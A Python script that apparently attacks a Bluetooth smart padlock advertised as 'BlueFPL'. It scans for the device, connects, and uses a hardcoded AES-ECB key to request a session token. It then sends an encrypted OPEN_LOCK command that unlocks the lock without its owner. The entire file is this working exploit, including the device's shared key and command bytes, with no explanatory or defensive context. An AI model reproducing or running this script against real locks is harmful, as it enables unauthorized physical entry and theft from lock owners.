from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

from cryptography.hazmat.primitives.ciphers import Cipher

from cryptography.hazmat.primitives.ciphers.algorithms import AES

from cryptography.hazmat.primitives.ciphers.modes import ECB

from cryptography.hazmat.backends import default_backend

import binascii

from bluepy.btle import Scanner,Peripheral,DefaultDelegate

KEY = "241F632E5907042061014C1A3A45193B"

TOKEN = ""

class NotifyDelegate(DefaultDelegate):

    def __init__(self,params):

        DefaultDelegate.__init__(self)

    def handleNotification(self,cHandle,data):

        global TOKEN

        print("Notification from Handle: 0x" + format(cHandle,"02X"))

        TOKEN = decrypt(binascii.hexlify(data))

        print(TOKEN)

def decrypt(plaintext):

    key = binascii.unhexlify(KEY)

    if len(key) == 16: 

        algorithm = algorithms.AES(key)

    else:

        raise ValueError("Invalid key size")

    backend = default_backend()

    cipher = Cipher(algorithm, modes.ECB(), backend=backend)

    decryptor = cipher.decryptor()

    encrypted_data = binascii.unhexlify(plaintext)

    decrypted_data = decryptor.update(encrypted_data) + decryptor.finalize()

    return binascii.hexlify(decrypted_data)

def encrypt(plaintext):

    key = binascii.unhexlify(KEY)

    backend = default_backend()

    algorithm = algorithms.AES(key)

    cipher = Cipher(algorithm, modes.ECB(), backend=backend)

    encryptor = cipher.encryptor()

    decrypted_data = binascii.unhexlify(plaintext)

    encrypted_data = encryptor.update(decrypted_data) + encryptor.finalize()

    return binascii.hexlify(encrypted_data)

def done(addr):

    global TOKEN

    print("[+]Find BlueFPL")

    print("[+]Try Connecting.....")

    conn = Peripheral(addr)

    if conn:

        print("[+]Connecting successfully!")

        conn.withDelegate(NotifyDelegate(conn))

    else:

        print("[+]Fail to connet")

        exit(1)

    print("[+]Try find fee7")

    svc_uuid = "0000fee7-0000-1000-8000-00805f9b34fb"

    svc = conn.getServiceByUUID(svc_uuid)

    if svc :

        print("[+]Found fee7!")

    else :

        print("[+]fee7 not found")

        exit(1)

    print(svc.uuid)

    TX_CHAR = conn.getCharacteristics(uuid = "000036f5-0000-1000-8000-00805f9b34fb")[0]

    RX_CHAR = conn.getCharacteristics(uuid = "000036f6-0000-1000-8000-00805f9b34fb")[0]

    print("[+]Try GET_TOKEN")

    pd = "06010101000000000000000000000000"

    hEcg = RX_CHAR.getHandle()

    hEcgcc = 0

    for descriptor in conn.getDescriptors(hEcg,svc.hndEnd):

        if (descriptor.uuid == 0x2902):

            print("[+]Found descriptor handle")

            hEcgcc = descriptor.handle

    if hEcgcc == 0:

        print("Fail to find descriptor handle")

        exit(1)

    print("[+]Descriptor handle:"+str(hEcgcc))

    conn.writeCharacteristic(hEcgcc,bytes([1,0]))

    while True:

        if conn.waitForNotifications(1.0):

            break

        print("Wating....")

        TX_CHAR.write(binascii.unhexlify(encrypt(pd)))   

    TOKEN = TOKEN[6:14]

    print(b"[+]TOKEN:"+TOKEN)

    print("[+]Try OPEN_LOCK")

    pd = b"050106303030303030"+TOKEN+b"000000"

    TX_CHAR.write(binascii.unhexlify(encrypt(pd)))   

    print("[+]Open successfully!")

    conn.disconnect()

if __name__ == "__main__":

    scanner = Scanner()

    devices = scanner.scan(timeout = 3)

    for dev in devices:

        if dev.getValueText(9) and ("BlueFPL" in dev.getValueText(9)):

            done(dev.addr)